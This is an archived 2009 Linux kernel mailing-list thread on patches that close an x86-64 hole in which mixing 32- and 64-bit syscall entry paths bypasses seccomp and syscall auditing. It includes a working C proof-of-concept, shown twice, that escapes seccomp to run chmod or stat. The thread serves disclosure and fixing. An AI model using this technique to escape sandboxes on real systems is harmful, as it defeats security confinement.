linux-kernel.vger.kernel.org archive mirror
 help / color / mirror / Atom feed
* [PATCH 0/2] x86-64: 32/64 syscall arch holes
@ 2009-02-28  3:02 Roland McGrath
  2009-02-28  3:03 ` [PATCH 1/2] x86-64: syscall-audit: fix 32/64 syscall hole Roland McGrath
  2009-02-28  3:04 ` [PATCH 2/2] x86-64: seccomp: " Roland McGrath
  0 siblings, 2 replies; 31+ messages in thread
From: Roland McGrath @ 2009-02-28  3:02 UTC (permalink / raw)
  To: Andrew Morton, Linus Torvalds; +Cc: x86, linux-kernel, stable

On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with
ljmp, and then use the "syscall" instruction to make a 64-bit system
call.  A 64-bit process make a 32-bit system call with int $0x80.

Both these uses can confuse some things that think they know what system
call and arguments the registers mean.  This is easily fixed by checking
TS_COMPAT ("syscall we are in is 32-bit") instead of TIF_IA32 ("this task
was started as 32-bit").

I don't know of any other arch that is susceptible to a similar problem.
I think on other 32/64 arch's either the syscall table is the same anyway,
or it's not possible to make an other-wordsize flavored syscall at all,
or both.

It occurred to me that the audit case was wrong, but I didn't try to test
it.  A test program similar to the seccomp exploit would be the way to do
it (but omit the prctl call) and there are many more options of a syscall
number whose presumed-arch meaning is harmless and not noticed by your
audit setup, but whose actually-other-arch meaning is something that could
be malicious and that your audit setup intends to flag.

The following changes since commit 778ef1e6cbb049c9bcbf405936ee6f2b6e451892:
  Linus Torvalds (1):
        Merge git://git.kernel.org/.../gregkh/staging-2.6

are available in the git repository at:

  git://git.kernel.org/pub/scm/linux/kernel/git/frob/linux-2.6-roland.git x86/syscall-arch-holes

Roland McGrath (2):
      x86-64: syscall-audit: fix 32/64 syscall hole
      x86-64: seccomp: fix 32/64 syscall hole

 arch/x86/include/asm/seccomp_64.h |   14 ++++++++------
 arch/x86/kernel/ptrace.c          |    2 +-
 kernel/seccomp.c                  |   11 ++++++++---
 3 files changed, 17 insertions(+), 10 deletions(-)

Thanks,
Roland

^ permalink raw reply	[flat|nested] 31+ messages in thread

* [PATCH 1/2] x86-64: syscall-audit: fix 32/64 syscall hole
  2009-02-28  3:02 [PATCH 0/2] x86-64: 32/64 syscall arch holes Roland McGrath
@ 2009-02-28  3:03 ` Roland McGrath
  2009-02-28  3:04 ` [PATCH 2/2] x86-64: seccomp: " Roland McGrath
  1 sibling, 0 replies; 31+ messages in thread
From: Roland McGrath @ 2009-02-28  3:03 UTC (permalink / raw)
  To: Andrew Morton, Linus Torvalds; +Cc: x86, linux-kernel, stable

On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with
ljmp, and then use the "syscall" instruction to make a 64-bit system
call.  A 64-bit process make a 32-bit system call with int $0x80.

In both these cases, audit_syscall_entry() will use the wrong system
call number table and the wrong system call argument registers.  This
could be used to circumvent a syscall audit configuration that filters
based on the syscall numbers or argument details.

Signed-off-by: Roland McGrath <roland@redhat.com>
---
 arch/x86/kernel/ptrace.c |    2 +-
 1 files changed, 1 insertions(+), 1 deletions(-)

diff --git a/arch/x86/kernel/ptrace.c b/arch/x86/kernel/ptrace.c
index 5a4c23d..06ca07f 100644
--- a/arch/x86/kernel/ptrace.c
+++ b/arch/x86/kernel/ptrace.c
@@ -1388,7 +1388,7 @@ void send_sigtrap(struct task_struct *tsk, struct pt_regs *regs,
 #ifdef CONFIG_X86_32
 # define IS_IA32	1
 #elif defined CONFIG_IA32_EMULATION
-# define IS_IA32	test_thread_flag(TIF_IA32)
+# define IS_IA32	is_compat_task()
 #else
 # define IS_IA32	0
 #endif

^ permalink raw reply related	[flat|nested] 31+ messages in thread

* [PATCH 2/2] x86-64: seccomp: fix 32/64 syscall hole
  2009-02-28  3:02 [PATCH 0/2] x86-64: 32/64 syscall arch holes Roland McGrath
  2009-02-28  3:03 ` [PATCH 1/2] x86-64: syscall-audit: fix 32/64 syscall hole Roland McGrath
@ 2009-02-28  3:04 ` Roland McGrath
  2009-02-28  3:36   ` Linus Torvalds
  1 sibling, 1 reply; 31+ messages in thread
From: Roland McGrath @ 2009-02-28  3:04 UTC (permalink / raw)
  To: Andrew Morton, Linus Torvalds; +Cc: x86, linux-kernel, stable

On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with
ljmp, and then use the "syscall" instruction to make a 64-bit system
call.  A 64-bit process make a 32-bit system call with int $0x80.

In both these cases under CONFIG_SECCOMP=y, secure_computing() will use
the wrong system call number table.  The fix is simple: test TS_COMPAT
instead of TIF_IA32.  Here is an example exploit:

	/* test case for seccomp circumvention on x86-64

	   There are two failure modes: compile with -m64 or compile with -m32.

	   The -m64 case is the worst one, because it does "chmod 777 ." (could
	   be any chmod call).  The -m32 case demonstrates it was able to do
	   stat(), which can glean information but not harm anything directly.

	   A buggy kernel will let the test do something, print, and exit 1; a
	   fixed kernel will make it exit with SIGKILL before it does anything.
	*/

	#define _GNU_SOURCE
	#include <assert.h>
	#include <inttypes.h>
	#include <stdio.h>
	#include <linux/prctl.h>
	#include <sys/stat.h>
	#include <unistd.h>
	#include <asm/unistd.h>

	int
	main (int argc, char **argv)
	{
	  char buf[100];
	  static const char dot[] = ".";
	  long ret;
	  unsigned st[24];

	  if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0)
	    perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?");

	#ifdef __x86_64__
	  assert ((uintptr_t) dot < (1UL << 32));
	  asm ("int $0x80 # %0 <- %1(%2 %3)"
	       : "=a" (ret) : "0" (15), "b" (dot), "c" (0777));
	  ret = snprintf (buf, sizeof buf,
			  "result %ld (check mode on .!)\n", ret);
	#elif defined __i386__
	  asm (".code32\n"
	       "pushl %%cs\n"
	       "pushl $2f\n"
	       "ljmpl $0x33, $1f\n"
	       ".code64\n"
	       "1: syscall # %0 <- %1(%2 %3)\n"
	       "lretl\n"
	       ".code32\n"
	       "2:"
	       : "=a" (ret) : "0" (4), "D" (dot), "S" (&st));
	  if (ret == 0)
	    ret = snprintf (buf, sizeof buf,
			    "stat . -> st_uid=%u\n", st[7]);
	  else
	    ret = snprintf (buf, sizeof buf, "result %ld\n", ret);
	#else
	# error "not this one"
	#endif

	  write (1, buf, ret);

	  syscall (__NR_exit, 1);
	  return 2;
	}

Signed-off-by: Roland McGrath <roland@redhat.com>
---
 arch/x86/include/asm/seccomp_64.h |   14 ++++++++------
 kernel/seccomp.c                  |   11 ++++++++---
 2 files changed, 16 insertions(+), 9 deletions(-)

diff --git a/arch/x86/include/asm/seccomp_64.h b/arch/x86/include/asm/seccomp_64.h
index 4171bb7..40e2564 100644
--- a/arch/x86/include/asm/seccomp_64.h
+++ b/arch/x86/include/asm/seccomp_64.h
@@ -3,15 +3,17 @@
 
 #include <linux/thread_info.h>
 
-#ifdef TIF_32BIT
-#error "unexpected TIF_32BIT on x86_64"
-#else
-#define TIF_32BIT TIF_IA32
-#endif
-
 #include <linux/unistd.h>
 #include <asm/ia32_unistd.h>
 
+/*
+ * This indicates we are inside a 32-bit system call (only testable
+ * synchronously by current), whereas TIF_IA32 indicates we are a 32-bit
+ * task.  A 32-bit task can make a 64-bit syscall by ljmp into 64-bit
+ * USER_CS, and a 64-bit task can make a 32-bit syscall by int $0x80.
+ */
+#define IS_COMPAT_TASK	is_compat_task()
+
 #define __NR_seccomp_read __NR_read
 #define __NR_seccomp_write __NR_write
 #define __NR_seccomp_exit __NR_exit
diff --git a/kernel/seccomp.c b/kernel/seccomp.c
index ad64fcb..8bf212f 100644
--- a/kernel/seccomp.c
+++ b/kernel/seccomp.c
@@ -8,6 +8,7 @@
 
 #include <linux/seccomp.h>
 #include <linux/sched.h>
+#include <linux/compat.h>
 
 /* #define SECCOMP_DEBUG 1 */
 #define NR_SECCOMP_MODES 1
@@ -22,7 +23,11 @@ static int mode1_syscalls[] = {
 	0, /* null terminated */
 };
 
-#ifdef TIF_32BIT
+#if defined TIF_32BIT && !defined IS_COMPAT_TASK
+# define IS_COMPAT_TASK	test_thread_flag(TIF_32BIT)
+#endif
+
+#ifdef IS_COMPAT_TASK
 static int mode1_syscalls_32[] = {
 	__NR_seccomp_read_32, __NR_seccomp_write_32, __NR_seccomp_exit_32, __NR_seccomp_sigreturn_32,
 	0, /* null terminated */
@@ -37,8 +42,8 @@ void __secure_computing(int this_syscall)
 	switch (mode) {
 	case 1:
 		syscall = mode1_syscalls;
-#ifdef TIF_32BIT
-		if (test_thread_flag(TIF_32BIT))
+#ifdef IS_COMPAT_TASK
+		if (IS_COMPAT_TASK)
 			syscall = mode1_syscalls_32;
 #endif
 		do {

^ permalink raw reply related	[flat|nested] 31+ messages in thread

* Re: [PATCH 2/2] x86-64: seccomp: fix 32/64 syscall hole
  2009-02-28  3:04 ` [PATCH 2/2] x86-64: seccomp: " Roland McGrath
@ 2009-02-28  3:36   ` Linus Torvalds
  2009-02-28  3:52     ` Linus Torvalds
  0 siblings, 1 reply; 31+ messages in thread
From: Linus Torvalds @ 2009-02-28  3:36 UTC (permalink / raw)
  To: Roland McGrath; +Cc: Andrew Morton, x86, linux-kernel, stable



On Fri, 27 Feb 2009, Roland McGrath wrote:
> --- a/arch/x86/include/asm/seccomp_64.h
> +++ b/arch/x86/include/asm/seccomp_64.h
> +/*
> + * This indicates we are inside a 32-bit system call (only testable
> + * synchronously by current), whereas TIF_IA32 indicates we are a 32-bit
> + * task.  A 32-bit task can make a 64-bit syscall by ljmp into 64-bit
> + * USER_CS, and a 64-bit task can make a 32-bit syscall by int $0x80.
> + */
> +#define IS_COMPAT_TASK	is_compat_task()
> +
> --- a/kernel/seccomp.c
> +++ b/kernel/seccomp.c
> +#if defined TIF_32BIT && !defined IS_COMPAT_TASK
> +# define IS_COMPAT_TASK	test_thread_flag(TIF_32BIT)
> +#endif
> +
> +#ifdef IS_COMPAT_TASK

Ok, please explain this madness.

The whole crazy IS_COMPAT_TASK dance seems to be too messy for words. Why? 
What's going on?

		Linus

^ permalink raw reply	[flat|nested] 31+ messages in thread

* Re: [PATCH 2/2] x86-64: seccomp: fix 32/64 syscall hole
  2009-02-28  3:36   ` Linus Torvalds
@ 2009-02-28  3:52     ` Linus Torvalds
  2009-02-28  4:46       ` Ingo Molnar
  2009-02-28  7:25       ` Roland McGrath
  0 siblings, 2 replies; 31+ messages in thread
From: Linus Torvalds @ 2009-02-28  3:52 UTC (permalink / raw)
  To: Roland McGrath; +Cc: Andrew Morton, x86, linux-kernel, stable



On Fri, 27 Feb 2009, Linus Torvalds wrote:
> 
> Ok, please explain this madness.
> 
> The whole crazy IS_COMPAT_TASK dance seems to be too messy for words. Why? 
> What's going on?

Ok, I can see what's going on. And it's disgusting.

Just make everybody do that "is_compat_task()" thing. parisc already did, 
and you just made x86-64 do so too. The only remaining TIF_32BIT users are 
powerpc and sparc. So instead of having this insane crud, please just add 
the trivial definitions to the two remaining places, and we don't have to 
have this insane mess. Ok?

It is clear that TIF_32BIT is _not_ a generic flag for 32/64-bit system 
calls, so let's stop pretending it is, and then having ugly special cases 
for when it's not.

			Linus

^ permalink raw reply	[flat|nested] 31+ messages in thread

* Re: [PATCH 2/2] x86-64: seccomp: fix 32/64 syscall hole
  2009-02-28  3:52     ` Linus Torvalds
@ 2009-02-28  4:46       ` Ingo Molnar
  2009-02-28  7:25       ` Roland McGrath
  1 sibling, 0 replies; 31+ messages in thread
From: Ingo Molnar @ 2009-02-28  4:46 UTC (permalink / raw)
  To: Linus Torvalds; +Cc: Roland McGrath, Andrew Morton, x86, linux-kernel, stable


* Linus Torvalds <torvalds@linux-foundation.org> wrote:

> On Fri, 27 Feb 2009, Linus Torvalds wrote:
> > 
> > Ok, please explain this madness.
> > 
> > The whole crazy IS_COMPAT_TASK dance seems to be too messy 
> > for words. Why? What's going on?
> 
> Ok, I can see what's going on. And it's disgusting.
> 
> Just make everybody do that "is_compat_task()" thing. parisc 
> already did, and you just made x86-64 do so too. The only 
> remaining TIF_32BIT users are powerpc and sparc. So instead of 
> having this insane crud, please just add the trivial 
> definitions to the two remaining places, and we don't have to 
> have this insane mess. Ok?
> 
> It is clear that TIF_32BIT is _not_ a generic flag for 
> 32/64-bit system calls, so let's stop pretending it is, and 
> then having ugly special cases for when it's not.

Seconded.

	Ingo

^ permalink raw reply	[flat|nested] 31+ messages in thread

* Re: [PATCH 2/2] x86-64: seccomp: fix 32/64 syscall hole
  2009-02-28  3:52     ` Linus Torvalds
  2009-02-28  4:46       ` Ingo Molnar
@ 2009-02-28  7:25       ` Roland McGrath
  2009-02-28  7:31         ` Ingo Molnar
  2009-02-28 17:23         ` Linus Torvalds
  1 sibling, 2 replies; 31+ messages in thread
From: Roland McGrath @ 2009-02-28  7:25 UTC (permalink / raw)
  To: Linus Torvalds
  Cc: Andrew Morton, x86, linux-kernel, stable, linux-mips, sparclinux,
	linuxppc-dev

> Ok, I can see what's going on. And it's disgusting.

That's what I thought when I saw TIF_32BIT in seccomp.

I did the simplest fix I could see touching only x86.

I don't know any other arch well enough to be sure that TIF_32BIT isn't the
wrong test there too.  I'd like to leave that worry to the arch maintainers.

But here is the patch you asked for.

Thanks,
Roland

---
[PATCH] x86-64: seccomp: fix 32/64 syscall hole

On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with
ljmp, and then use the "syscall" instruction to make a 64-bit system
call.  A 64-bit process make a 32-bit system call with int $0x80.

In both these cases under CONFIG_SECCOMP=y, secure_computing() will use
the wrong system call number table.  The fix is simple: test TS_COMPAT
instead of TIF_IA32.  Here is an example exploit:

	/* test case for seccomp circumvention on x86-64

	   There are two failure modes: compile with -m64 or compile with -m32.

	   The -m64 case is the worst one, because it does "chmod 777 ." (could
	   be any chmod call).  The -m32 case demonstrates it was able to do
	   stat(), which can glean information but not harm anything directly.

	   A buggy kernel will let the test do something, print, and exit 1; a
	   fixed kernel will make it exit with SIGKILL before it does anything.
	*/

	#define _GNU_SOURCE
	#include <assert.h>
	#include <inttypes.h>
	#include <stdio.h>
	#include <linux/prctl.h>
	#include <sys/stat.h>
	#include <unistd.h>
	#include <asm/unistd.h>

	int
	main (int argc, char **argv)
	{
	  char buf[100];
	  static const char dot[] = ".";
	  long ret;
	  unsigned st[24];

	  if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0)
	    perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?");

	#ifdef __x86_64__
	  assert ((uintptr_t) dot < (1UL << 32));
	  asm ("int $0x80 # %0 <- %1(%2 %3)"
	       : "=a" (ret) : "0" (15), "b" (dot), "c" (0777));
	  ret = snprintf (buf, sizeof buf,
			  "result %ld (check mode on .!)\n", ret);
	#elif defined __i386__
	  asm (".code32\n"
	       "pushl %%cs\n"
	       "pushl $2f\n"
	       "ljmpl $0x33, $1f\n"
	       ".code64\n"
	       "1: syscall # %0 <- %1(%2 %3)\n"
	       "lretl\n"
	       ".code32\n"
	       "2:"
	       : "=a" (ret) : "0" (4), "D" (dot), "S" (&st));
	  if (ret == 0)
	    ret = snprintf (buf, sizeof buf,
			    "stat . -> st_uid=%u\n", st[7]);
	  else
	    ret = snprintf (buf, sizeof buf, "result %ld\n", ret);
	#else
	# error "not this one"
	#endif

	  write (1, buf, ret);

	  syscall (__NR_exit, 1);
	  return 2;
	}

Signed-off-by: Roland McGrath <roland@redhat.com>
---
 arch/mips/include/asm/seccomp.h    |    1 -
 arch/powerpc/include/asm/compat.h  |    5 +++++
 arch/powerpc/include/asm/seccomp.h |    4 ----
 arch/sparc/include/asm/compat.h    |    5 +++++
 arch/sparc/include/asm/seccomp.h   |    6 ------
 arch/x86/include/asm/seccomp_32.h  |    6 ------
 arch/x86/include/asm/seccomp_64.h  |    8 --------
 kernel/seccomp.c                   |    7 ++++---
 8 files changed, 14 insertions(+), 28 deletions(-)

diff --git a/arch/mips/include/asm/seccomp.h b/arch/mips/include/asm/seccomp.h
index 36ed440..a6772e9 100644
--- a/arch/mips/include/asm/seccomp.h
+++ b/arch/mips/include/asm/seccomp.h
@@ -1,6 +1,5 @@
 #ifndef __ASM_SECCOMP_H
 
-#include <linux/thread_info.h>
 #include <linux/unistd.h>
 
 #define __NR_seccomp_read __NR_read
diff --git a/arch/powerpc/include/asm/compat.h b/arch/powerpc/include/asm/compat.h
index d811a8c..4774c2f 100644
--- a/arch/powerpc/include/asm/compat.h
+++ b/arch/powerpc/include/asm/compat.h
@@ -210,5 +210,10 @@ struct compat_shmid64_ds {
 	compat_ulong_t __unused6;
 };
 
+static inline int is_compat_task(void)
+{
+	return test_thread_flag(TIF_32BIT);
+}
+
 #endif /* __KERNEL__ */
 #endif /* _ASM_POWERPC_COMPAT_H */
diff --git a/arch/powerpc/include/asm/seccomp.h b/arch/powerpc/include/asm/seccomp.h
index 853765e..00c1d91 100644
--- a/arch/powerpc/include/asm/seccomp.h
+++ b/arch/powerpc/include/asm/seccomp.h
@@ -1,10 +1,6 @@
 #ifndef _ASM_POWERPC_SECCOMP_H
 #define _ASM_POWERPC_SECCOMP_H
 
-#ifdef __KERNEL__
-#include <linux/thread_info.h>
-#endif
-
 #include <linux/unistd.h>
 
 #define __NR_seccomp_read __NR_read
diff --git a/arch/sparc/include/asm/compat.h b/arch/sparc/include/asm/compat.h
index f260b58..0e70625 100644
--- a/arch/sparc/include/asm/compat.h
+++ b/arch/sparc/include/asm/compat.h
@@ -240,4 +240,9 @@ struct compat_shmid64_ds {
 	unsigned int	__unused2;
 };
 
+static inline int is_compat_task(void)
+{
+	return test_thread_flag(TIF_32BIT);
+}
+
 #endif /* _ASM_SPARC64_COMPAT_H */
diff --git a/arch/sparc/include/asm/seccomp.h b/arch/sparc/include/asm/seccomp.h
index 7fcd996..adca1bc 100644
--- a/arch/sparc/include/asm/seccomp.h
+++ b/arch/sparc/include/asm/seccomp.h
@@ -1,11 +1,5 @@
 #ifndef _ASM_SECCOMP_H
 
-#include <linux/thread_info.h> /* already defines TIF_32BIT */
-
-#ifndef TIF_32BIT
-#error "unexpected TIF_32BIT on sparc64"
-#endif
-
 #include <linux/unistd.h>
 
 #define __NR_seccomp_read __NR_read
diff --git a/arch/x86/include/asm/seccomp_32.h b/arch/x86/include/asm/seccomp_32.h
index a6ad87b..b811d6f 100644
--- a/arch/x86/include/asm/seccomp_32.h
+++ b/arch/x86/include/asm/seccomp_32.h
@@ -1,12 +1,6 @@
 #ifndef _ASM_X86_SECCOMP_32_H
 #define _ASM_X86_SECCOMP_32_H
 
-#include <linux/thread_info.h>
-
-#ifdef TIF_32BIT
-#error "unexpected TIF_32BIT on i386"
-#endif
-
 #include <linux/unistd.h>
 
 #define __NR_seccomp_read __NR_read
diff --git a/arch/x86/include/asm/seccomp_64.h b/arch/x86/include/asm/seccomp_64.h
index 4171bb7..84ec1bd 100644
--- a/arch/x86/include/asm/seccomp_64.h
+++ b/arch/x86/include/asm/seccomp_64.h
@@ -1,14 +1,6 @@
 #ifndef _ASM_X86_SECCOMP_64_H
 #define _ASM_X86_SECCOMP_64_H
 
-#include <linux/thread_info.h>
-
-#ifdef TIF_32BIT
-#error "unexpected TIF_32BIT on x86_64"
-#else
-#define TIF_32BIT TIF_IA32
-#endif
-
 #include <linux/unistd.h>
 #include <asm/ia32_unistd.h>
 
diff --git a/kernel/seccomp.c b/kernel/seccomp.c
index ad64fcb..57d4b13 100644
--- a/kernel/seccomp.c
+++ b/kernel/seccomp.c
@@ -8,6 +8,7 @@
 
 #include <linux/seccomp.h>
 #include <linux/sched.h>
+#include <linux/compat.h>
 
 /* #define SECCOMP_DEBUG 1 */
 #define NR_SECCOMP_MODES 1
@@ -22,7 +23,7 @@ static int mode1_syscalls[] = {
 	0, /* null terminated */
 };
 
-#ifdef TIF_32BIT
+#ifdef CONFIG_COMPAT
 static int mode1_syscalls_32[] = {
 	__NR_seccomp_read_32, __NR_seccomp_write_32, __NR_seccomp_exit_32, __NR_seccomp_sigreturn_32,
 	0, /* null terminated */
@@ -37,8 +38,8 @@ void __secure_computing(int this_syscall)
 	switch (mode) {
 	case 1:
 		syscall = mode1_syscalls;
-#ifdef TIF_32BIT
-		if (test_thread_flag(TIF_32BIT))
+#ifdef CONFIG_COMPAT
+		if (is_compat_task())
 			syscall = mode1_syscalls_32;
 #endif
 		do {

^ permalink raw reply related	[flat|nested] 31+ messages in thread

* Re: [PATCH 2/2] x86-64: seccomp: fix 32/64 syscall hole
  2009-02-28  7:25       ` Roland McGrath
@ 2009-02-28  7:31         ` Ingo Molnar
  2009-02-28  7:36           ` Roland McGrath
  2009-02-28 17:23         ` Linus Torvalds
  1 sibling, 1 reply; 31+ messages in thread
From: Ingo Molnar @ 2009-02-28  7:31 UTC (permalink / raw)
  To: Roland McGrath
  Cc: Linus Torvalds, Andrew Morton, x86, linux-kernel, stable,
	linux-mips, sparclinux, linuxppc-dev


* Roland McGrath <roland@redhat.com> wrote:

> +#ifdef CONFIG_COMPAT
> +		if (is_compat_task())
>  			syscall = mode1_syscalls_32;
>  #endif

btw., shouldnt is_compat_task() expand to 0 in the 
!CONFIG_COMPAT case? That way we could remove this #ifdef too. 
(and move the first #ifdef inside the array initialization so 
that we always have a mode1_syscalls_32[] array.)

	Ingo

^ permalink raw reply	[flat|nested] 31+ messages in thread

* Re: [PATCH 2/2] x86-64: seccomp: fix 32/64 syscall hole
  2009-02-28  7:31         ` Ingo Molnar
@ 2009-02-28  7:36           ` Roland McGrath
  0 siblings, 0 replies; 31+ messages in thread
From: Roland McGrath @ 2009-02-28  7:36 UTC (permalink / raw)
  To: Ingo Molnar
  Cc: Linus Torvalds, Andrew Morton, x86, linux-kernel, stable,
	linux-mips, sparclinux, linuxppc-dev

> btw., shouldnt is_compat_task() expand to 0 in the 
> !CONFIG_COMPAT case? That way we could remove this #ifdef too. 
> (and move the first #ifdef inside the array initialization so 
> that we always have a mode1_syscalls_32[] array.)

I guess you mean define it in linux/compat.h then?
Go right ahead.  Whatever you want is fine by me.


Thanks,
Roland

^ permalink raw reply	[flat|nested] 31+ messages in thread

* Re: [PATCH 2/2] x86-64: seccomp: fix 32/64 syscall hole
  2009-02-28  7:25       ` Roland McGrath
  2009-02-28  7:31         ` Ingo Molnar
@ 2009-02-28 17:23         ` Linus Torvalds
  2009-02-28 17:46           ` [stable] " Greg KH
                             ` (3 more replies)
  1 sibling, 4 replies; 31+ messages in thread
From: Linus Torvalds @ 2009-02-28 17:23 UTC (permalink / raw)
  To: Roland McGrath
  Cc: Andrew Morton, x86, linux-kernel, stable, linux-mips, sparclinux,
	linuxppc-dev



On Fri, 27 Feb 2009, Roland McGrath wrote:
> 
> I don't know any other arch well enough to be sure that TIF_32BIT isn't the
> wrong test there too.  I'd like to leave that worry to the arch maintainers.

Agreed - it may be that others will want to not use TIF_32BIT too. It 
really does make much more sense to have it as a thread-local status flag 
than as an atomic (and thus expensive to modify) thread-flag, not just on 
x86.

But I think other architectures will find it easier to see what's going on 
if the code is straightforward and they can just fix their 
'is_compat_task()' function. And:

> But here is the patch you asked for.

Yes, this looks much more straightforward. 

And I guess the seccomp interaction means that this is potentially a 
2.6.29 thing. Not that I know whether anybody actually _uses_ seccomp. It 
does seem to be enabled in at least Fedora kernels, but it might not be 
used anywhere.

		Linus

^ permalink raw reply	[flat|nested] 31+ messages in thread

* Re: [stable] [PATCH 2/2] x86-64: seccomp: fix 32/64 syscall hole
  2009-02-28 17:23         ` Linus Torvalds
@ 2009-02-28 17:46           ` Greg KH
  2009-02-28 17:54             ` Arjan van de Ven
  2009-02-28 21:09           ` Benjamin Herrenschmidt
                             ` (2 subsequent siblings)
  3 siblings, 1 reply; 31+ messages in thread
From: Greg KH @ 2009-02-28 17:46 UTC (permalink / raw)
  To: Linus Torvalds
  Cc: Roland McGrath, linux-mips, x86, linux-kernel, linuxppc-dev,
	sparclinux, Andrew Morton, stable

On Sat, Feb 28, 2009 at 09:23:36AM -0800, Linus Torvalds wrote:
> On Fri, 27 Feb 2009, Roland McGrath wrote:
> > But here is the patch you asked for.
> 
> Yes, this looks much more straightforward. 
> 
> And I guess the seccomp interaction means that this is potentially a 
> 2.6.29 thing. Not that I know whether anybody actually _uses_ seccomp. It 
> does seem to be enabled in at least Fedora kernels, but it might not be 
> used anywhere.

It's enabled in SuSE kernels.

thanks,

greg k-h

^ permalink raw reply	[flat|nested] 31+ messages in thread

* Re: [stable] [PATCH 2/2] x86-64: seccomp: fix 32/64 syscall hole
  2009-02-28 17:46           ` [stable] " Greg KH
@ 2009-02-28 17:54             ` Arjan van de Ven
  2009-02-28 18:23               ` Greg KH
  0 siblings, 1 reply; 31+ messages in thread
From: Arjan van de Ven @ 2009-02-28 17:54 UTC (permalink / raw)
  To: Greg KH
  Cc: Linus Torvalds, Roland McGrath, linux-mips, x86, linux-kernel,
	linuxppc-dev, sparclinux, Andrew Morton, stable

On Sat, 28 Feb 2009 09:46:01 -0800
Greg KH <greg@kroah.com> wrote:

> On Sat, Feb 28, 2009 at 09:23:36AM -0800, Linus Torvalds wrote:
> > On Fri, 27 Feb 2009, Roland McGrath wrote:
> > > But here is the patch you asked for.
> > 
> > Yes, this looks much more straightforward. 
> > 
> > And I guess the seccomp interaction means that this is potentially
> > a 2.6.29 thing. Not that I know whether anybody actually _uses_
> > seccomp. It does seem to be enabled in at least Fedora kernels, but
> > it might not be used anywhere.
> 
> It's enabled in SuSE kernels.
> 

but are there users of it?
I thought Andrea stopped the cpushare thing that was the only user of
this....


-- 
Arjan van de Ven 	Intel Open Source Technology Centre
For development, discussion and tips for power savings, 
visit http://www.lesswatts.org

^ permalink raw reply	[flat|nested] 31+ messages in thread

* Re: [stable] [PATCH 2/2] x86-64: seccomp: fix 32/64 syscall hole
  2009-02-28 17:54             ` Arjan van de Ven
@ 2009-02-28 18:23               ` Greg KH
  2009-02-28 20:27                 ` Greg KH
  0 siblings, 1 reply; 31+ messages in thread
From: Greg KH @ 2009-02-28 18:23 UTC (permalink / raw)
  To: Arjan van de Ven
  Cc: Linus Torvalds, Roland McGrath, linux-mips, x86, linux-kernel,
	linuxppc-dev, sparclinux, Andrew Morton, stable

On Sat, Feb 28, 2009 at 09:54:33AM -0800, Arjan van de Ven wrote:
> On Sat, 28 Feb 2009 09:46:01 -0800
> Greg KH <greg@kroah.com> wrote:
> 
> > On Sat, Feb 28, 2009 at 09:23:36AM -0800, Linus Torvalds wrote:
> > > On Fri, 27 Feb 2009, Roland McGrath wrote:
> > > > But here is the patch you asked for.
> > > 
> > > Yes, this looks much more straightforward. 
> > > 
> > > And I guess the seccomp interaction means that this is potentially
> > > a 2.6.29 thing. Not that I know whether anybody actually _uses_
> > > seccomp. It does seem to be enabled in at least Fedora kernels, but
> > > it might not be used anywhere.
> > 
> > It's enabled in SuSE kernels.
> > 
> 
> but are there users of it?
> I thought Andrea stopped the cpushare thing that was the only user of
> this....

I do not really know, but as it is enabled, we need to at least fix it.

thanks,

greg k-h

^ permalink raw reply	[flat|nested] 31+ messages in thread

* Re: [stable] [PATCH 2/2] x86-64: seccomp: fix 32/64 syscall hole
  2009-02-28 18:23               ` Greg KH
@ 2009-02-28 20:27                 ` Greg KH
  0 siblings, 0 replies; 31+ messages in thread
From: Greg KH @ 2009-02-28 20:27 UTC (permalink / raw)
  To: Arjan van de Ven
  Cc: linux-mips, x86, linux-kernel, linuxppc-dev, sparclinux,
	Andrew Morton, Linus Torvalds, stable, Roland McGrath

On Sat, Feb 28, 2009 at 10:23:13AM -0800, Greg KH wrote:
> On Sat, Feb 28, 2009 at 09:54:33AM -0800, Arjan van de Ven wrote:
> > On Sat, 28 Feb 2009 09:46:01 -0800
> > Greg KH <greg@kroah.com> wrote:
> > 
> > > On Sat, Feb 28, 2009 at 09:23:36AM -0800, Linus Torvalds wrote:
> > > > On Fri, 27 Feb 2009, Roland McGrath wrote:
> > > > > But here is the patch you asked for.
> > > > 
> > > > Yes, this looks much more straightforward. 
> > > > 
> > > > And I guess the seccomp interaction means that this is potentially
> > > > a 2.6.29 thing. Not that I know whether anybody actually _uses_
> > > > seccomp. It does seem to be enabled in at least Fedora kernels, but
> > > > it might not be used anywhere.
> > > 
> > > It's enabled in SuSE kernels.
> > > 
> > 
> > but are there users of it?
> > I thought Andrea stopped the cpushare thing that was the only user of
> > this....
> 
> I do not really know, but as it is enabled, we need to at least fix it.

Sorry, I ment "we" as in SuSE, not as the "community".  As the patch can
easily be backported to the SuSE kernels and resolved there, I don't
think it's something that probably needs to be backported for the
-stable tree either.

thanks,

greg k-h

^ permalink raw reply	[flat|nested] 31+ messages in thread

* Re: [PATCH 2/2] x86-64: seccomp: fix 32/64 syscall hole
  2009-02-28 17:23         ` Linus Torvalds
  2009-02-28 17:46           ` [stable] " Greg KH
@ 2009-02-28 21:09           ` Benjamin Herrenschmidt
  2009-03-02  1:44           ` Roland McGrath
  2009-05-06 18:46           ` Markus Gutschke (顧孟勤)
  3 siblings, 0 replies; 31+ messages in thread
From: Benjamin Herrenschmidt @ 2009-02-28 21:09 UTC (permalink / raw)
  To: Linus Torvalds
  Cc: Roland McGrath, linux-mips, x86, linux-kernel, linuxppc-dev,
	sparclinux, Andrew Morton, stable

On Sat, 2009-02-28 at 09:23 -0800, Linus Torvalds wrote:
> 
> On Fri, 27 Feb 2009, Roland McGrath wrote:
> > 
> > I don't know any other arch well enough to be sure that TIF_32BIT isn't the
> > wrong test there too.  I'd like to leave that worry to the arch maintainers.
> 
> Agreed - it may be that others will want to not use TIF_32BIT too. It 
> really does make much more sense to have it as a thread-local status flag 
> than as an atomic (and thus expensive to modify) thread-flag, not just on 
> x86.

FYI. _TIF_32BIT is the right test on powerpc (it's also what entry_64.S
tests to pick the appropriate syscall table).

Cheers,
Ben.



^ permalink raw reply	[flat|nested] 31+ messages in thread

* Re: [PATCH 2/2] x86-64: seccomp: fix 32/64 syscall hole
  2009-02-28 17:23         ` Linus Torvalds
